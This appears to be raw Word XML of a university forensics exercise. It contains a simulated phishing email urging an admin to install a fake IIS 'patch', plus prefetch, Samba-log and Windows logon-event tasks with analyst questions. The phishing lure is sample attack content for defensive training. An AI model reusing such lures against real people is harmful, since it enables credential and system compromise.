                          <w:p w14:paraId="23525432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X-Received: by 2002:a1c:44a0:: with SMTP id z6mr12345678ybd.87.169.123.45</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="2874D14A" w14:textId="6A46B29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for &lt;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  <w:r w:rsidR="00BE64F0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@</w:t>
                            </w:r>
                            <w:r w:rsidR="00BE64F0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example</w:t>
                            </w:r>
                            <w:r w:rsidR="00BE64F0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.com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&gt;; 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Wed, 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17 Sep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2025 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15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</w:t>
                            </w:r>
                            <w:r w:rsidR="008E5163"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15</w:t>
                            </w:r>
                            <w:r w:rsidRPr="000D65B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:09 -0700 (PDT)</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="248DD688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Content-Type: text/html; charset=UTF-8</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="706BE04B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Content-Transfer-Encoding: 7bit</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="7588829F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</w:p>
                          <w:p w14:paraId="110804D3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&lt;html&gt;</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="7BADDE40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&lt;body&gt;</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="58344804" w14:textId="2E252563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&lt;h1&gt;</w:t>
                            </w:r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Urgent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!&lt;/h1&gt;</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="68BBAA93" w14:textId="5B070C0A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&lt;p&gt;Dear</w:t>
                            </w:r>
                            <w:r w:rsidR="00BF1E6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Admin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&lt;/p&gt;</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="46D93B75" w14:textId="718179D1" w:rsidR="002B34B1" w:rsidRPr="00AF37D2" w:rsidRDefault="002B34B1" w:rsidP="008528F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</w:t>
                            </w:r>
                            <w:r w:rsidR="008528F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Your ISS webserver is vulnerable with the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like most</w:t>
                            </w:r>
                            <w:r w:rsidR="00BF1E6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worse vulnerability ever. Please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download the patch pull program below. Install the program with admin privilege and then download IIS patch. Install </w:t>
                            </w:r>
                            <w:r w:rsidR="004C79BB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the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</w:t>
                            </w:r>
                            <w:r w:rsidR="00D53D0C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patch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on your web server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:&lt;/p&gt;</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="16CAC56F" w14:textId="1AC858B1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&lt;p&gt;&lt;a href="https://example.com/staging/</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00AF37D2">
                              <w:t xml:space="preserve"> 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patch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.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exe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"&gt;</w:t>
                            </w:r>
                            <w:r w:rsidR="007469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Patch Program</w:t>
                            </w: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&lt;/a&gt;&lt;/p&gt;</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="7C04FA34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&lt;p&gt;Best regards,&lt;br&gt;</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="65FF96A6" w14:textId="48676670" w:rsidR="002B34B1" w:rsidRPr="00AF37D2" w:rsidRDefault="00746934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Ubuntu Security</w:t>
                            </w:r>
                            <w:r w:rsidR="002B34B1"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&lt;/p&gt;</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="19433E97" w14:textId="77777777" w:rsidR="002B34B1" w:rsidRPr="00AF37D2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&lt;/body&gt;</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="43C4E9FE" w14:textId="77777777" w:rsidR="002B34B1" w:rsidRPr="000E3718" w:rsidRDefault="002B34B1" w:rsidP="002B34B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AF37D2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&lt;/html&gt;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58550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DC2D4CC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6A554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8563CF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F6E989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0E0BB29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878F9B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411024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B912FF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BEAE0B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CBBA43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97ED1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06F185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104C58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F1A874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7C5E100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D55AE3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B095F6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19EC492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2E7E51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4B705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A2208DD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BABA6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48F1E59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18C1700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465B063C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D0AFE38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9C77CB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5075DAE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6A1ABB5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345343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0F2012B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F23B5DF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805116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578F9F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D19CA34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016EE817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6CA5A81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6BFEB76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25CF5DD3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1F4F30B6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3C0C6D6A" w14:textId="77777777" w:rsidR="002B34B1" w:rsidRDefault="002B34B1" w:rsidP="0053454A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5DF7C5A4" w14:textId="620DD557" w:rsidR="002B34B1" w:rsidRDefault="002B34B1" w:rsidP="006E54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 did remark that</w:t>
            </w:r>
            <w:r w:rsidR="00746934">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> it was odd to </w:t>
            </w:r>
            <w:r w:rsidR="006E5480">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>get patches a different way, but the system is never perfect.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002B34B1" w14:paraId="33AA31F4" w14:textId="77777777" w:rsidTr="0053454A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9016" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="21774020" w14:textId="0E03A626" w:rsidR="003B0DB8" w:rsidRDefault="003B0DB8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this look like phishing?</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35FD939C" w14:textId="3D09A831" w:rsidR="002B34B1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 is the proper sender of the email? (be careful to defang this domain) </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C14AAF3" w14:textId="368635F8" w:rsidR="002B34B1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was IP address of this sender? (be careful to defang this IP address)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BA3D067" w14:textId="55D14096" w:rsidR="002B34B1" w:rsidRPr="006E5480" w:rsidRDefault="002B34B1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interesting about this IP? </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="07BF97B6" w14:textId="57A79DFF" w:rsidR="006E5480" w:rsidRDefault="00BF1E64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stands out as </w:t>
            </w:r>
            <w:r w:rsidR="001E4420">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>odd about this email?</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1FEF1FF8" w14:textId="546521DE" w:rsidR="001E4420" w:rsidRPr="00CA0E31" w:rsidRDefault="003B0DB8" w:rsidP="0053454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Where will the adversary</w:t>
            </w:r>
            <w:r w:rsidR="000B3ED4">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> patch program(s)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> be running now?</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="25439FA1" w14:textId="31D57052" w:rsidR="67E59C76" w:rsidRDefault="67E59C76" w:rsidP="67E59C76">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64B49E00" w14:textId="4C175289" w:rsidR="71180FE4" w:rsidRPr="00465A86" w:rsidRDefault="00141C57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Possible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1C57" w14:paraId="7367B7E8" w14:textId="77777777" w:rsidTr="0053454A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9016" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="39EB5166" w14:textId="0FC06D12" w:rsidR="00141C57" w:rsidRDefault="00141C57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 executable called patch</w:t>
            </w:r>
            <w:r w:rsidRPr="00451AC8">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>.exe</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> has been found on the Admin’s desktop. The team has collected the hash for you to investigate this file.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="139E79DE" w14:textId="77777777" w:rsidR="00141C57" w:rsidRPr="00451AC8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1B5FBE3" w14:textId="51EFAC56" w:rsidR="00141C57" w:rsidRPr="00B762B4" w:rsidRDefault="005A0BED" w:rsidP="0053454A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A0BED">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
              </w:rPr>
              <w:t>5EDF006430BED016D5935AD996C6F53F2DF2C7730AA7FC91633B9DCC7569F94C</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7D8CFCD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24CBD776" w14:textId="03E2FC3A" w:rsidR="00141C57" w:rsidRPr="00451AC8" w:rsidRDefault="00903F7E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 Yas</w:t>
            </w:r>
            <w:r w:rsidR="00141C57" w:rsidRPr="3BF12F61">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">, has asked </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">if </w:t>
            </w:r>
            <w:r w:rsidR="00141C57" w:rsidRPr="3BF12F61">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">we can tell if the file was executed. The associated prefect file has been provided for </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>patch</w:t>
            </w:r>
            <w:r w:rsidR="00141C57" w:rsidRPr="3BF12F61">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">.exe. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B159552" w14:textId="77777777" w:rsidR="00141C57" w:rsidRPr="00451AC8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60E4142" w14:textId="13C9CD76" w:rsidR="00141C57" w:rsidRPr="00451AC8" w:rsidRDefault="00903F7E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patch</w:t>
            </w:r>
            <w:r w:rsidR="00141C57" w:rsidRPr="00451AC8">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>.exe-12345678.pf</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2BEA4BFB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  <w:r w:rsidRPr="00451AC8">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>---------------------</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5671AF3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D67F309" wp14:editId="37E36953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49530</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="5266690" cy="4312920"/>
                      <wp:effectExtent l="0" t="0" r="10160" b="11430"/>
                      <wp:wrapNone/>
                      <wp:docPr id="84522532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9E17AD3-3973-4FD8-9965-A1F5E7BE8C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6690" cy="43129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200C61" w14:textId="603D9ADF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Executable Name: </w:t>
                                  </w:r>
                                  <w:r w:rsidR="00903F7E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patch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.exe</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="7F8797A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Hash Path: 12345678</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="0FD237F8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Executable Size: 12499.456 KB</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="0EB9DC2B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Prefetch File Version: 30 (Windows 10)</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="0B402482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36C53C42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Run Count: 1</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="47A5902F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Last Run Times:</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="35993D9B" w14:textId="31F14796" w:rsidR="00141C57" w:rsidRPr="003B1205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- 2025-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09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8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0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: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22</w:t>
                                  </w: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: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56</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="52DD37AD" w14:textId="563ECD94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- 2025-0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9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-1</w:t>
                                  </w:r>
                                  <w:r w:rsidR="00E43902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9</w:t>
                                  </w:r>
                                  <w:r w:rsidR="00903F7E" w:rsidRPr="003B1205"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14:35:33</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="0BADD5EC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Volume Information:</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="26F46BB1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Volume Serial Number: ABCD-1234</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="09D43E8B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Volume Creation Time: 2023-01-01 00:00:00</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="2E701AC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1DC06504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Referenced Files and Directories:</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="78F015AE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 xml:space="preserve">  - C:\Windows\System32\kernel32.dll</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="2D7C9C23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000000"/>
                                    </w:rPr>
                                    <w:t> </w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="207EC229" w14:textId="77777777" w:rsidR="00141C57" w:rsidRDefault="00141C57" w:rsidP="00141C57">
                                  <w:pPr>
                                    <w:spacing w:line="276" w:lineRule="auto"/>
                                    <w:rPr>
                                      <w:rFonts w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                                      <w:color w:val="FFFFFF" w:themeColor="light1"/>
                                    </w:rPr>
                                  </w:pPr>
                                  <w:r>
                                    <w:rPr>
                                      <w:rFonts w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                                      <w:color w:val="FFFFFF" w:themeColor="light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spcFirstLastPara="0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7F309" id="_x0000_s1028" style="position:absolute;margin-left:2.75pt;margin-top:3.9pt;width:414.7pt;height:339.6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" fillcolor="#fae2d5 [661]" strokecolor="#030e13 [484]" strokeweight="1pt">
                      <v:textbox>
                        <w:txbxContent>
                          <w:p w14:paraId="03200C61" w14:textId="603D9ADF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Executable Name: </w:t>
                            </w:r>
                            <w:r w:rsidR="00903F7E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patch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.exe</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="7F8797A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Hash Path: 12345678</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="0FD237F8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Executable Size: 12499.456 KB</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="0EB9DC2B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Prefetch File Version: 30 (Windows 10)</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="0B402482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36C53C42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Run Count: 1</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="47A5902F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Last Run Times:</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="35993D9B" w14:textId="31F14796" w:rsidR="00141C57" w:rsidRPr="003B1205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- 2025-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09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8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0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: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22</w:t>
                            </w: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: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56</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="52DD37AD" w14:textId="563ECD94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- 2025-0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9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-1</w:t>
                            </w:r>
                            <w:r w:rsidR="00E43902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9</w:t>
                            </w:r>
                            <w:r w:rsidR="00903F7E" w:rsidRPr="003B1205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14:35:33</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="0BADD5EC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Volume Information:</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="26F46BB1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Volume Serial Number: ABCD-1234</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="09D43E8B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Volume Creation Time: 2023-01-01 00:00:00</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="2E701AC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1DC06504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Referenced Files and Directories:</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="78F015AE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 - C:\Windows\System32\kernel32.dll</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="2D7C9C23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 </w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="207EC229" w14:textId="77777777" w:rsidR="00141C57" w:rsidRDefault="00141C57" w:rsidP="00141C57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FFFFFF" w:themeColor="light1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FFFFFF" w:themeColor="light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5B419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1F14188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F6BF743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BF9C50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808181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99060DA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2E05DC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047A087D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8A4668B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35FED91C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0CDBCF4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7AAC069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CA46725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A15B89A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5E57D4B2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A8787F4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C778CE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16678E0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338114E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8FC8E5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3BED718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F2829CC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62D838F8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1C0E755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1B825A7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40896776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  <w:p w14:paraId="7252F401" w14:textId="77777777" w:rsidR="00141C57" w:rsidRDefault="00141C57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141C57" w14:paraId="726B6754" w14:textId="77777777" w:rsidTr="0053454A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9016" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6D072EB2" w14:textId="5FD8F36A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</w:t>
            </w:r>
            <w:r w:rsidR="000A202C" w:rsidRPr="000A202C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>patch</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">.exe a </w:t>
            </w:r>
            <w:r w:rsidR="005A0BED">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>malicious</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> file?</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="164E29AC" w14:textId="57ECA573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Analysing the </w:t>
            </w:r>
            <w:r w:rsidR="00903F7E">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>patch</w:t>
            </w:r>
            <w:r w:rsidRPr="00451AC8">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>.exe-12345678.pf</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> file, has </w:t>
            </w:r>
            <w:r w:rsidR="0032289C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>patch</w:t>
            </w:r>
            <w:r w:rsidR="0032289C" w:rsidRPr="00451AC8">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>.exe</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> been executed before?</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4FA1755D" w14:textId="5BDBB69B" w:rsidR="00141C5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many times has the file been executed?</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="00204E60" w14:textId="16F9518C" w:rsidR="00141C57" w:rsidRPr="00390FD7" w:rsidRDefault="00141C57" w:rsidP="00141C5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does this </w:t>
            </w:r>
            <w:r w:rsidR="00747C83">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>executable</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> allow an adversary to do? </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7045D7C0" w14:textId="066E4A87" w:rsidR="67E59C76" w:rsidRDefault="67E59C76" w:rsidP="67E59C76">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="628E873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FFF45C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1FA0D64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1CD1733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7C46E0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5D23F77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A594167" w14:textId="111EFA24" w:rsidR="20A81079" w:rsidRPr="00465A86" w:rsidRDefault="20A81079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 xml:space="preserve">More </w:t>
      </w:r>
      <w:r w:rsidR="0033779F" w:rsidRPr="00465A86">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>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779F" w14:paraId="5B705796" w14:textId="77777777" w:rsidTr="0053454A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9016" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6AC45004" w14:textId="09328DC0" w:rsidR="0033779F" w:rsidRDefault="0033779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COS30015 team is worried that some secrets went missing and were exfiltrated, possibly </w:t>
            </w:r>
            <w:r w:rsidR="00CE7EF5">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>making</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> them an interesting target. Analyse the file </w:t>
            </w:r>
            <w:r w:rsidR="006978AB" w:rsidRPr="006978AB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>student_samba_log_simulation</w:t>
            </w:r>
            <w:r w:rsidR="006978AB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>.txt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83E985A" w14:textId="77777777" w:rsidR="0033779F" w:rsidRDefault="0033779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structure of the log is:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="64676193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Timestamp: When the log entry was created</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D173D09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Log Level: Severity or verbosity of the log message</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F8D6D0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Process ID: ID of the process generating the log</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F9D12B0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Thread ID: ID of the thread within the process (if applicable)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="27E2E605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Samba Component: The specific Samba service or module</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="469F1FDD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Message Text: The actual log message</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61963727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IP Address: IP address of the client</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5ACEB326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 xml:space="preserve">User: The </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>user</w:t>
            </w:r>
            <w:r w:rsidRPr="00102B8B">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> performing the action</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="46BBACC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Action: The type of action performed (upload, download, edit, view)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28E0C87B" w14:textId="77777777" w:rsidR="0033779F" w:rsidRPr="00102B8B" w:rsidRDefault="0033779F" w:rsidP="0053454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102B8B">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>File Name: Name of the file involved</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5277DD44" w14:textId="77777777" w:rsidR="0033779F" w:rsidRDefault="0033779F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33779F" w14:paraId="4905E7AD" w14:textId="77777777" w:rsidTr="0053454A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9016" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7FDD062E" w14:textId="75BA1749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file was uniquely downloaded which could be a sensitive data leak?</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D431A1B" w14:textId="7F1C4AE5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IP downloaded this file? (be careful to defang this IP address</w:t>
            </w:r>
            <w:r w:rsidR="00697897">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>, do not load it in a browser, ping it, etc.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24D6056" w14:textId="7B722B4C" w:rsidR="0033779F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kind of IP is this?</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1D75BDFA" w14:textId="5E19ABED" w:rsidR="0033779F" w:rsidRPr="00102B8B" w:rsidRDefault="0033779F" w:rsidP="0053454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 </w:t>
            </w:r>
            <w:r w:rsidR="00697897">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>interacted with</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> this file?</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="03A1F5B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13EB4D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465400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5416E1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58DD28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E60849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21A813E0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D566ABA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AB073E8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5792F64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3FBBB12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9B1B2C6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9A76C6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510D35F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0AC7C7AA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36AC4D0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4BC56B1D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0F4767C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6F707205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339C7679" w14:textId="77777777" w:rsidR="00465A86" w:rsidRDefault="00465A86" w:rsidP="67E59C76">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B5C5592" w14:textId="4DD9B25D" w:rsidR="67E59C76" w:rsidRPr="00465A86" w:rsidRDefault="002E022E" w:rsidP="67E59C76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lastRenderedPageBreak/>
        <w:t>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413F" w14:paraId="3584DB2C" w14:textId="77777777" w:rsidTr="0053454A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9016" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="73D460D1" w14:textId="52286B88" w:rsidR="002F413F" w:rsidRDefault="002F413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Seeing that the adversary connected via the </w:t>
            </w:r>
            <w:r w:rsidR="00307599">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>Web Server</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> machine in the DMZ, the team has provided you with an interesting log entry for the machine.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35931BF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67A4140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8C5A7A0" wp14:editId="01BC9140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6350</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="5074920" cy="7383780"/>
                      <wp:effectExtent l="0" t="0" r="11430" b="26670"/>
                      <wp:wrapNone/>
                      <wp:docPr id="1664765756" name="Rectang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D53CE39-AF55-47EF-8235-06929F8CA8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4920" cy="7383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024494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Event:</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="3D0DAA1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System:</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="5042593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Provider Name: Microsoft-Windows-Security-Auditing</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="1C667E2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EventID: 4624</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="2302AE2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Version: 2</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="38E0F8E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Level: 0</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="29B94F6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Task: 1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3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4</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="4527A63D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Opcode: 0</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="1D21561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Keywords: 0x8020000000000000</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="22F17C37" w14:textId="340FCF5B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TimeCreated SystemTime: 202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5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-0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9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2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0T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08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:2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4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:01.000Z</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="2537101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EventRecordID: 12360</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="4C7202F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Correlation: </w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="4CE8ED8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Execution ProcessID: 1234 ThreadID: 5678</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="1EEC996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Channel: Security</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="75C4C91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Computer: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19639A07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Security: </w:t>
                                  </w:r>
                                </w:p>
